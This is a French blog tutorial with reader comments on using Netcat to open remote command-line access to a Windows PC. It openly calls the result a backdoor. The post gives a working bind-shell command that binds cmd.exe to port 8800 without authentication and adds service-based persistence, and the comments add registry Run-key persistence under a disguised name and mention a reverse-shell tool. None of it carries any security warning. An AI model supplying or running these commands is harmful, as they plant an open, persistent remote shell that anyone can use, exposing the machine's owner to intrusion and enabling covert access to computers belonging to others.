Il est parfois très utile de se connecter à distance à votre machine windows. par exemple votre ordinateur chez vous est sous windows, vous le laissez allumé 24h.
Pendant la journée au boulot, vous avez besoin de lancer un téléchargement ou de récupérer un document. Vous vous connectez à distance sur votre machine et vous ouvrez une console comme si vous étiez en face de votre PC ! Tout ce que vous avez appris à faire dans une console, vous pouvez le faire à distance depuis n’importe quelle machine dans le monde.Ici nous allons voir comment accéder à votre PC à distance depuis n’importe quelle machine en utilisant Netcat.

Netcat c’est quoi ?

Netcat est un utilitaire permettant d’ouvrir des connexions réseau, que ce soit UDP ou TCP.  Il existe sur plusieurs systèmes d’exploitation et s’utilise en ligne de commande.


Il peut être utilisé pour connaître l’état des ports à la façon d’un scan de ports. Mais la flexibilité de cet outil permet des usages plus exotiques : transferts de fichiers, backdoor, serveur proxy basique, ou encore messagerie instantanée.

Étapes à suivre

Alors pour commencer  nous allons  créer un backdoor, qui est un accès à distance à une machine hôte, pour cela  on commence par télécharger Netcat pour windows  ici puis on dé-zippe Netcat dans le dossier %SYSTEMROOT%/System32 ensuite executez netcat. Dans la console, tapez la commande suivante :

[code]nc -d -L -e cmd.exe -p 8800[/code]

  • nc indique à windows d’éxecuter nc.exe avec les arguments suivants
  • -d indique à netcat de ne pas lire sur l’entrée standard.
  • -L indique à netcat de ne pas se fermer et d’attendre les connexions
  • -e indique a netcat le programme qui doit exécuter  (cmd.exe)
  • -p spécifie le port à utiliser(ici on choisit le port 8800 mais vous pouvez choisir un autre)

Après l’exécution de  cette commande vous pouvez à partir de n’importe quelle machine vous connecter sur le poste distant avec une simple commande:

[code]telnet *.*.*.* 8800[/code]

*.*.*.* désigne l’adresse IP de la machine distant qui vous faut remplacer.

Et voilà, vous êtes chez vous ! Vous pouvez faire ce qui vous chante : lire vos fichiers, écrire des fichiers, lancer une recherche, exécuter un programme, bref vous êtes chez vous.  🙂

Pour vous déconnecter, tapez « logout » .

Attention Netcat arrettera de tourner dès que la machine hôte sera éteinte, et ne refonctionnera que si l’utilisateur tape encore la commande de netcat.

Afin d’améliorer notre backdor   on va programmer le lancement de netcat a chaque démarrage de l’ordinateur, pour cela, nous allons créer un service, qui est un programme tournant en arrière-plan de manière invisible.
Ouvrez la console d’administration Windows (Démarrer, Executer puis tapez cmd) et entrez la commande suivante:

[code]sc create netcat binPath= c:system32netcat.exe start= auto[/code]

Et voila, maintenant vous pouvez vous connecter à votre machine distante dès l’ouverture de la session windows. 🙂

5 Commentaires

  1. Az

    L’astuce du service ne fonctionne pas chez moi. J’ai donc pensé à créer un petit fichier .reg contenant :

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
    « Netcat »= »C:\Windows\system32\nc.exe -d -L -e cmd.exe -p 8800 »

    On lance le fichier .reg. Netcat est alors lancé automatiquement au démarrage et un telnet sur le port 8800 de la cible ouvre directement l’invite de commande.

  2. Oui une tres bonne idée, on peut faire aussi un fichier bat contenant ce code:

    REG ADD « HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun » /v « lola » /t « REG_SZ » /d « %SYSTEMROOT%System32nc.exe -d -L -e cmd.exe -p 8800 »

  3. Bigb

    Je m’étais anciennement servi de cela mais netcat est maintenant dépassé, un logiciel a été conçu basé sur netcat mais actualisé, il se nomme Ncat.

    J’ai créé un outil permettant le création de backdoor sous Ncat en connexion reveverse TCP SSL